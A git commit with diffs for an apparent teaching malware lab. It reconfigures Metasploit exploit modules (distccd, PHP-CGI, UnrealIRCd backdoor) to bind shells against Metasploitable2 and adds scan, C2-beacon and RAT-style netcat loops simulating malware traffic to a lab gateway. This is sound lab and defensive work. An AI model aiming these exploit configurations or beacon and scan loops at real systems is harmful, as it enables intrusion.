Solvable Tier-3 holes: callback payloads, busybox workloads, bridge by default

Closes the next batch of issues from the post-mortem. The previous
"each run uses a different vulnerability" commit shipped 5 modules
but 3 of them couldn't actually fire under SLIRP+restrict=on:
their reverse-shell payloads needed a callback channel the launcher
didn't provide, AND their LHOST options were set to {{ target_ip }}
(the target's IP, not the attacker's — copy-paste from RHOSTS).
Meanwhile, the workloads.py shell commands used bash-only /dev/tcp
redirects that silently no-op'd in the busybox shell sessions
Metasploitable2 returns. Net effect: episodes that selected those
modules would have produced session_open_timeout + dead workloads.

Module configs (the three callback ones):
  exploits/modules/distccd_command_exec.toml
  exploits/modules/php_cgi_arg_injection.toml
  exploits/modules/unreal_ircd_3281_backdoor.toml
    - Switch payload from cmd/unix/reverse* to cmd/unix/bind_perl
      so the target listens on a known port; msfrpcd connects to it
      via the host's hostfwd (no callback path required).
    - Drop the bogus LHOST = "{{ target_ip }}" — bind shells don't
      use LHOST.
    - Add [runtime] table:
        requires_bridge = true
        extra_target_ports = [<bind_lport>]
      Both fields are honored by the loader (ModuleConfig.requires_bridge)
      and the launcher (TARGET_PORTS gets the extra port hostfwd'd
      when BRIDGE mode is active).

orchestrator/fleet.py
  When BRIDGE is unset in env, _run_slot filters the module catalog
  down to modules where requires_bridge=False before calling
  select_module. Two same-socket-shell modules (vsftpd_234_backdoor +
  samba_usermap_script) survive — fleet still has variety; just
  doesn't pick modules whose payloads can't land. With BRIDGE set,
  the full catalog rotates as before, AND BRIDGE is propagated to
  the per-slot subprocess env so launch_target.sh enters tap+bridge
  mode.
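
The filter and the env propagation described above can be sketched in isolation. This is a simplified stand-in, not the code in _run_slot: Module, usable_modules, and slot_env are hypothetical names, and Module carries only the one field the filter needs.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Module:
    """Stand-in for ModuleConfig; only the fields the filter needs."""
    name: str
    requires_bridge: bool = False


def usable_modules(modules: dict, bridge: Optional[str]) -> dict:
    """Keep every module when a bridge is set, else only same-socket ones."""
    return {k: v for k, v in modules.items() if bridge or not v.requires_bridge}


def slot_env(base_env: dict, bridge: Optional[str]) -> dict:
    """Copy the env for the per-slot subprocess, forwarding BRIDGE if set."""
    env = dict(base_env)
    if bridge:
        env["BRIDGE"] = bridge
    return env


catalog = {
    "vsftpd_234_backdoor": Module("vsftpd_234_backdoor"),
    "samba_usermap_script": Module("samba_usermap_script"),
    "distccd_command_exec": Module("distccd_command_exec", requires_bridge=True),
}
print(sorted(usable_modules(catalog, None)))
print(sorted(usable_modules(catalog, "br-malware")))
```

An empty filtered catalog is a valid result; per the description above, the fleet then falls back to Tier-2 rather than selecting from nothing.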

exploits/workloads.py
  Replaced bash-only constructs in three profiles:
    scan-and-dial  /dev/tcp/HOST/PORT redirects → nc -z -w 1
    bursty-c2      same fix
    shell-resident exec 3<>/dev/tcp/...  → piping into nc -w
  All three now run cleanly in busybox / dash / Metasploitable2's
  default shell. The remaining three profiles (cpu-saturate, io-walk,
  low-and-slow) were already busybox-portable.
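
For reference, the connect-only check that `nc -z -w 1 HOST PORT` performs can be approximated in Python. This is a sketch only: tcp_probe is a hypothetical name, nothing in this commit ships it, and it assumes a Python interpreter exists on the guest.

```python
import socket


def tcp_probe(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connect to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Refused, unreachable, or timed out: treat all as "not open".
        return False


# Self-check against a throwaway listener on loopback.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))  # port 0 lets the OS pick a free port
listener.listen(1)
open_port = listener.getsockname()[1]
print(tcp_probe("127.0.0.1", open_port))
listener.close()
```

Like the nc form, the probe sends no payload; it only completes and tears down the handshake.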

scripts/install-lab-host.sh
  - lab-host.env now defaults BRIDGE=br-malware (was commented out).
    Operators opt out by commenting the line out again.
  - New step 6b: provisions br-malware via vm/setup_bridge.sh AND
    pre-creates a per-slot tap pool (cis490tap0..7 for Tier-2 demo,
    cis490target0..7 for Tier-3 target) all attached to br-malware
    and brought up. Launchers reference these by SLOT — no sudo
    needed at episode time.
  - On bridge-setup failure, the script auto-comments BRIDGE in the
    env file with an "auto-disabled: bridge setup failed" note so
    the fleet falls back to same-socket modules + Tier-2 cleanly.
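
The auto-disable rewrite is done with sed in the install script. A Python rendering of the same substitution, useful for checking that it is idempotent, might look like the following; disable_bridge is a hypothetical helper and the sample env text is illustrative.

```python
import re

# Matches only an active assignment at the start of a line, so lines that
# are already commented out (starting with "#") are left untouched.
_BRIDGE_LINE = re.compile(r"^BRIDGE=br-malware", flags=re.MULTILINE)
_DISABLED = "# BRIDGE=br-malware # auto-disabled: bridge setup failed"


def disable_bridge(env_text: str) -> str:
    """Comment out an active BRIDGE=br-malware line; leave the rest as-is."""
    return _BRIDGE_LINE.sub(_DISABLED, env_text)


sample = "FLEET_HOST_ID=lab1\nBRIDGE=br-malware\n"
once = disable_bridge(sample)
print(once)
print(disable_bridge(once) == once)
```

Because the pattern is anchored at the start of a line, running the rewrite a second time changes nothing.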

tools/cis490_doctor.py
  Three new checks for the lab-host role:
    bridge: br-malware exists / up
    tier3: msfrpcd listening on 127.0.0.1:55553
    tier3: module catalog parses (counts same-socket vs requires_bridge)
  The bridge and msfrpcd checks are warn-level, so they don't fail an
  otherwise-healthy Tier-2-only setup; they tell the operator what's
  missing for full Tier-3 + source 4 coverage. A catalog that fails to
  parse is reported as fail.
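
As an illustration of the bridge check, here is one way the output of `ip -br link show br-malware` could be classified. This is a hedged sketch, not the doctor's code: bridge_status is a hypothetical name, the sample lines are made up, and it reads the state column where the shipped check does a substring match.

```python
def bridge_status(ip_br_output: str, name: str = "br-malware") -> str:
    """Classify `ip -br link show <name>` output as 'ok', 'warn', or 'missing'."""
    for line in ip_br_output.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0] == name:
            # Second column is the operational state (UP, DOWN, UNKNOWN, ...).
            return "ok" if fields[1] in ("UP", "UNKNOWN") else "warn"
    return "missing"


# Illustrative output lines; MAC addresses and flags are invented.
up = "br-malware       UP             02:00:00:00:00:01 <BROADCAST,MULTICAST,UP,LOWER_UP>"
down = "br-malware       DOWN           02:00:00:00:00:01 <NO-CARRIER,BROADCAST,MULTICAST,UP>"
print(bridge_status(up), bridge_status(down), bridge_status(""))
```

Reading the state column avoids counting the UP flag inside the angle brackets as an operational state. Whether that stricter reading is wanted for a bridge with no running guests is a judgment call.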

Tests: 132 (was 129). New cases:
  test_fleet.py +3
    - fleet skips requires_bridge modules when BRIDGE unset (asserted
      across 20 episodes; never picks a callback module)
    - fleet uses the full catalog when BRIDGE is set
    - BRIDGE env propagates to per-slot subprocess

What's still untested live: the bind_perl payloads against a real
Metasploitable2 in the bridge-enabled launcher path. That's a
deployment validation, not a code change. The unit tests confirm
the dispatch / filter logic; the live test is the next operator
action.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
max 2026-04-30 02:32:52 -05:00
parent a193d17ead
commit 507eac617b
9 changed files with 230 additions and 25 deletions


@ -40,6 +40,11 @@ class ModuleConfig:
payload_options: dict[str, Any] = field(default_factory=dict)
expected_session_type: str = "shell" # what we'll get on success
description: str = ""
# When true the module's payload uses a callback channel (reverse
# or bind shell) and won't land a session under SLIRP+restrict=on.
# The fleet runner skips these unless BRIDGE is set so episodes
# that fire them actually produce data.
requires_bridge: bool = False
def render_options(self, *, target_ip: str) -> dict[str, Any]:
"""Substitute ``{{ target_ip }}`` placeholders in options.
@ -93,6 +98,7 @@ def load_module_config(path: Path) -> ModuleConfig:
payload_options=dict(payload.get("options") or {}),
expected_session_type=raw.get("session", {}).get("type", "shell"),
description=raw.get("description", ""),
requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
)


@ -16,10 +16,21 @@ RHOSTS = "{{ target_ip }}"
RPORT = 3632
[payload]
path = "cmd/unix/reverse"
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
path = "cmd/unix/bind_perl"
[payload.options]
LHOST = "{{ target_ip }}"
LPORT = 4444
[session]
type = "shell"
[runtime]
# Reverse/bind callback path → needs the host-only bridge so the
# guest can reach the attacker (or the host can reach the bind port
# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
# lab host to enable.
requires_bridge = true
extra_target_ports = [4444]


@ -16,10 +16,13 @@ RPORT = 80
TARGETURI = "/"
[payload]
path = "cmd/unix/reverse_perl"
path = "cmd/unix/bind_perl"
[payload.options]
LHOST = "{{ target_ip }}"
LPORT = 4445
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4445]


@ -16,10 +16,13 @@ RHOSTS = "{{ target_ip }}"
RPORT = 6667
[payload]
path = "cmd/unix/reverse"
path = "cmd/unix/bind_perl"
[payload.options]
LHOST = "{{ target_ip }}"
LPORT = 4446
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4446]


@ -111,14 +111,19 @@ def _cpu_saturate() -> Workload:
def _scan_and_dial() -> Workload:
"""Mirai-class — TCP SYN-style probe of bridge subnet + occasional
"dial home" to the gateway. Heavy net, moderate CPU."""
"dial home" to the gateway. Heavy net, moderate CPU.
Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
latter is bash-only and silently no-ops on busybox / dash, which
is what Metasploitable2 and Alpine guest sessions actually run.
No Python fallback is implemented in this body; without nc the probes fail silently."""
body = (
" for i in 1 2 3 4 5 6 7 8 9 10; do\n"
" (echo > /dev/tcp/10.200.0.$((i+1))/23) 2>/dev/null &\n"
" (echo > /dev/tcp/10.200.0.$((i+1))/2323) 2>/dev/null &\n"
" nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
" nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
" done\n"
" wait\n"
" (echo dial-home > /dev/tcp/10.200.0.1/4444) 2>/dev/null\n"
" echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
" sleep 2\n"
)
w = _wrap_loop("scan-and-dial", body)
@ -151,11 +156,11 @@ def _io_walk() -> Workload:
def _bursty_c2() -> Workload:
"""Dridex-class — long idle, periodic small TCP burst to a fixed
peer (the bridge gateway)."""
peer (the bridge gateway). nc-based for busybox compatibility."""
body = (
" sleep 25\n"
" for i in 1 2 3; do\n"
" (echo c2-beacon-$$-$i > /dev/tcp/10.200.0.1/4445) 2>/dev/null\n"
" echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
" sleep 1\n"
" done\n"
)
@ -186,18 +191,18 @@ def _low_and_slow() -> Workload:
def _shell_resident() -> Workload:
"""RAT-style — keep a single TCP socket open to the gateway with
occasional command bursts. Long-lived flow, small bytes."""
# nc on Metasploitable2 is GNU netcat; on busybox it's also there.
# We use plain bash /dev/tcp redirects to avoid depending on nc.
"""RAT-style — keep a single TCP connection open to the gateway
with occasional command bursts. Long-lived flow, small bytes.
Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
feed into nc so the connection stays open for ~30 s before the
-w idle timeout closes it, matching the long-lived-flow shape.
Then we sleep + reconnect, producing the periodic-tick pattern."""
body = (
" exec 3<>/dev/tcp/10.200.0.1/4446 2>/dev/null && {\n"
" for i in 1 2 3 4 5 6; do\n"
" echo cmd-tick-$i >&3\n"
" ( for i in 1 2 3 4 5 6; do\n"
" echo cmd-tick-$i\n"
" sleep 5\n"
" done\n"
" exec 3<&-; exec 3>&-\n"
" }\n"
" done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
" sleep 5\n"
)
w = _wrap_loop("shell-resident", body)


@ -237,9 +237,25 @@ def _run_slot(
run_dir_base = "/tmp/cis490-vm-fleet"
# Decide tier.
bridge_iface = os.environ.get("BRIDGE") or None
# Filter the catalog to modules that can actually fire under the
# current launcher mode. Reverse / bind shells require the host-
# only bridge (no SLIRP+restrict=on guest egress), so skip those
# when BRIDGE isn't set; otherwise the exploit fires but the
# session never lands and the episode degenerates to a 30 s
# session_open_timeout.
if cfg.modules:
if bridge_iface:
usable_modules = dict(cfg.modules)
else:
usable_modules = {
k: v for k, v in cfg.modules.items() if not v.requires_bridge
}
else:
usable_modules = {}
tier3_ready = (
not cfg.force_tier2
and bool(cfg.modules)
and bool(usable_modules)
and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
)
@ -261,7 +277,7 @@ def _run_slot(
if tier3_ready:
module = select_module(
cfg.modules,
usable_modules,
host_id=cfg.host_id, slot=slot, episode_index=episode_index,
)
target_port = module_target_port(module) or 21
@ -271,6 +287,8 @@ def _run_slot(
# Each slot gets a unique host-side hostfwd port so concurrent
# targets don't collide on the loopback port.
env["PORT_BASE"] = str(target_port + slot * 1000)
if bridge_iface:
env["BRIDGE"] = bridge_iface
cmd = [
py,
str(cfg.repo_root / "tools" / "run_tier3_demo.py"),


@ -108,10 +108,44 @@ if [[ ! -f "$ENV_FILE" ]]; then
install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
# Read by cis490-orchestrator.service. Override per-host as needed.
FLEET_HOST_ID=$DEFAULT_HOST_ID
# BRIDGE=br-malware # uncomment to enable source 4 pcap capture
# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
# Tier-3 modules whose payloads need callback (reverse/bind shells).
# install-lab-host.sh provisions the bridge + tap pool below; leave
# this on unless your lab host can't run NETLINK ops.
BRIDGE=br-malware
EOF
fi
# --- 6b. host-only bridge + per-slot tap pool --------------------------
# br-malware lets pcap capture the guest traffic and lets bind/reverse
# shell payloads route between guest and host. We pre-create a small
# pool of taps so the launchers don't need sudo to attach interfaces;
# each slot uses cis490tap{SLOT} (Tier-2 demo) and cis490target{SLOT}
# (Tier-3 target). Idempotent: re-running on an already-set-up host is a
# no-op.
if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
log "bridge br-malware ready"
for n in 0 1 2 3 4 5 6 7; do
for prefix in cis490tap cis490target; do
tap="${prefix}${n}"
if ! ip link show "$tap" >/dev/null 2>&1; then
ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
ip tuntap add dev "$tap" mode tap 2>/dev/null || true
ip link set "$tap" master br-malware 2>/dev/null || true
ip link set "$tap" up 2>/dev/null || true
fi
done
done
log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
else
log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
# Comment out BRIDGE in the env file — fleet will still run
# Tier-2 + non-callback Tier-3 modules.
sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware # auto-disabled: bridge setup failed/' "$ENV_FILE"
fi
fi
# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
# already on disk. Trust boundary: "reached bootstrap.wg over WG"


@ -296,6 +296,67 @@ def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
assert res.tier == "tier2"
def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
"""Fleet must filter out callback-payload modules when BRIDGE is
unset; otherwise the exploit fires but the session never lands
and the episode degenerates to a 30 s session_open_timeout."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.delenv("BRIDGE", raising=False)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen_modules = set()
for ep in range(20):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen_modules.add(res.module_name)
# Every selected module must be callback-free (same-socket).
callback_modules = {
m.name for m in cfg.modules.values() if m.requires_bridge
}
assert callback_modules, "test setup error: expected some requires_bridge modules"
assert not (seen_modules & callback_modules), \
f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
"""With BRIDGE set, the full catalog (including reverse/bind shell
payloads) is in rotation."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen = set()
for ep in range(40):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen.add(res.module_name)
assert seen == set(cfg.modules.keys()), \
f"only saw {seen}/{set(cfg.modules.keys())}"
def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
"""When BRIDGE is set in the parent env, the per-slot subprocess
env must carry it through so launch_target.sh enters tap+bridge mode."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
"""Concurrent Tier-3 slots can't share the host-side hostfwd port
or all targets stomp on each other's vsftpd:21 → 21 mapping. The


@ -467,6 +467,44 @@ def check_tier3(report: Report) -> None:
else:
report.add(Check("tier3: msfrpcd on PATH", "ok"))
# Probe whether msfrpcd is actually listening (tier-3 fleet
# dispatch checks the same thing).
msfrpcd_listening = False
try:
with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
msfrpcd_listening = True
except OSError:
pass
if msfrpcd_listening:
report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
else:
report.add(Check(
"tier3: msfrpcd listening on 127.0.0.1:55553",
"warn",
detail="optional — fleet falls back to Tier 2 when down",
fix="sudo systemctl enable --now cis490-msfrpcd",
))
# Module catalog parses + at least one same-socket entry.
modules_dir = Path("/opt/cis490/exploits/modules")
if modules_dir.exists():
try:
from exploits.modules import load_module_configs as _load
catalog = _load(modules_dir)
same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
report.add(Check(
"tier3: module catalog parses",
"ok",
detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
f"({len(catalog) - len(same_socket)} need BRIDGE)",
))
except Exception as e:
report.add(Check(
"tier3: module catalog parses",
"fail",
detail=str(e),
fix="check exploits/modules/*.toml syntax",
))
images = Path("/var/lib/cis490/vm/images")
msf2 = images / "metasploitable2.qcow2"
if _path_exists(msf2):
@ -481,6 +519,31 @@ def check_tier3(report: Report) -> None:
))
def check_bridge(report: Report) -> None:
"""Bridge readiness — pcap (source 4) + reverse/bind callback
payloads both need this. Without it, Tier-3 episodes that pick
callback modules will fire but the session never lands."""
rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
if rc == 0 and "br-malware" in out:
if "UP" in out or "UNKNOWN" in out:
report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
else:
report.add(Check(
"bridge: br-malware up",
"warn",
detail=out.strip()[:80],
fix="sudo ip link set br-malware up",
))
else:
report.add(Check(
"bridge: br-malware exists",
"warn",
detail="optional — pcap capture + callback-payload Tier-3 "
"modules require it",
fix="sudo /opt/cis490/vm/setup_bridge.sh",
))
# ---------------------------------------------------------------------------
# checks — end to end (lab-host)
# ---------------------------------------------------------------------------
@ -537,6 +600,7 @@ def main(argv: list[str] | None = None) -> int:
if args.role == "lab-host":
check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
check_vm_prereqs(report)
check_bridge(report)
if not args.no_tier3:
check_tier3(report)
check_end_to_end(report)